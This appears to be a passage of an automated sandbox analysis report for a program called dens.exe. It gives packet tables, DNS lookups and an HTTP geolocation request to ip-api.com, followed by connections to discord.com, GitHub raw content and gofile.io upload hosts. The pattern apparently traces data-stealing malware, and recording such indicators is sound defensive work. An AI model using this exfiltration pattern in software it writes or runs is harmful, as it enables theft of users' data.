                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.521972895 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.522834063 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.522914886 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.524652958 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.524713039 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.525034904 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.525043011 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.567476034 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.717989922 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.718039989 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.718255997 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.718714952 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.718730927 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.721276045 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.721307993 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.721528053 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.722044945 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.722055912 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.324538946 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.325081110 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.325092077 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.325963974 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.326025963 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.327517986 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.327574968 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.327792883 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.327799082 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.379942894 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.522588968 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.522636890 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.522835970 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.523221016 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.523231030 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.525696993 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.525728941 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.525820017 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.526484966 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:55.526496887 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.165549040 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.166173935 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.166188955 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.167061090 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.167164087 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.168399096 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.168456078 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188414097 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188429117 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188621044 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188652039 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188875914 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.188905954 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.190545082 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.190572023 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.190865993 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.190898895 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191045046 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191072941 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191087961 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191101074 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191240072 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191260099 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191286087 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191298962 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191488028 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191538095 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.191565990 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198518991 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198719025 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198760986 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198782921 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198821068 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198843956 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.198925972 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203382969 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203766108 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:56.203774929 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068563938 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068619967 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.068676949 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.075758934 CET49754443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.075774908 CET44349754162.159.138.232192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379215956 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379240036 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.379308939 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.380291939 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.380306005 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.025985003 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.026710987 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.026741028 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.027622938 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.027678013 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029443979 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029510021 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029915094 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.029922962 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.083302021 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282216072 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282299995 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282330036 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282371044 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282401085 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282424927 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282455921 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.282465935 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283170938 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283186913 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283194065 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283260107 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283277988 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283286095 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.283365965 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406343937 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406428099 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406457901 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406526089 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406548023 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406557083 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.406584024 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407083035 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407110929 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407138109 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407138109 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407147884 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407404900 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407854080 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407928944 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407932997 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.407970905 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408000946 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408051014 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408080101 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408139944 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408411980 CET49757443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:58.408422947 CET44349757185.199.108.133192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198374987 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198410988 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.198482037 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.199048996 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:00.199062109 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051076889 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051676989 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.051703930 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.052594900 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.052660942 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054028988 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054085970 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054356098 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.054363012 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.098707914 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.370937109 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371006012 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371072054 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371592045 CET49760443192.168.2.445.112.123.126
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.371611118 CET4434976045.112.123.126192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557254076 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557293892 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.557770014 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.558401108 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.558413982 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.402786016 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.403584957 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.403601885 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.404484034 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.404540062 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.407172918 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.407231092 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.407645941 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.407651901 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408308029 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408340931 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408457041 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408487082 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408567905 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.408587933 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.409650087 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.409662008 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.410274029 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.410423040 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:02.410443068 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.887020111 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.887095928 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.887152910 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.887872934 CET49761443192.168.2.445.112.123.227
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.887896061 CET4434976145.112.123.227192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.890350103 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.890398026 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.890464067 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.891086102 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:03.891102076 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.496390104 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.496967077 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.496988058 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.497864008 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.497992039 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.499228954 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.499289036 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.499490023 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.499497890 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.551841974 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.706352949 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.706408024 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.706731081 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.707092047 CET49762443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:04.707103014 CET44349762162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.255546093 CET6284453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.263880968 CET53628441.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.892065048 CET6177153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET53617711.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.369591951 CET5619553192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.378124952 CET53561951.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:59.949549913 CET5374153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:59.956377029 CET53537411.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.547370911 CET6054853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.556431055 CET53605481.1.1.1192.168.2.4
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.255546093 CET192.168.2.41.1.1.10xc430Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.892065048 CET192.168.2.41.1.1.10xfa2bStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.369591951 CET192.168.2.41.1.1.10x6e41Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:59.949549913 CET192.168.2.41.1.1.10xfaa9Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.547370911 CET192.168.2.41.1.1.10x5bb8Standard query (0)store1.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.263880968 CET1.1.1.1192.168.2.40xc430No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET1.1.1.1192.168.2.40xfa2bNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET1.1.1.1192.168.2.40xfa2bNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET1.1.1.1192.168.2.40xfa2bNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET1.1.1.1192.168.2.40xfa2bNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.898650885 CET1.1.1.1192.168.2.40xfa2bNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.378124952 CET1.1.1.1192.168.2.40x6e41No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.378124952 CET1.1.1.1192.168.2.40x6e41No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.378124952 CET1.1.1.1192.168.2.40x6e41No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:57.378124952 CET1.1.1.1192.168.2.40x6e41No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:59.956377029 CET1.1.1.1192.168.2.40xfaa9No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 13, 2024 00:39:01.556431055 CET1.1.1.1192.168.2.40x5bb8No error (0)store1.gofile.io45.112.123.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            • discord.com
                                                                                                                                                                                                                                            • raw.githubusercontent.com
                                                                                                                                                                                                                                            • api.gofile.io
                                                                                                                                                                                                                                            • store1.gofile.io
                                                                                                                                                                                                                                            • ip-api.com
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.449740208.95.112.1806500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.285893917 CET129OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.880889893 CET468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:38:40 GMT
                                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 291
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 22 7d
                                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.68"}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.449752162.159.128.2334436500C:\Users\user\Desktop\dens.exe
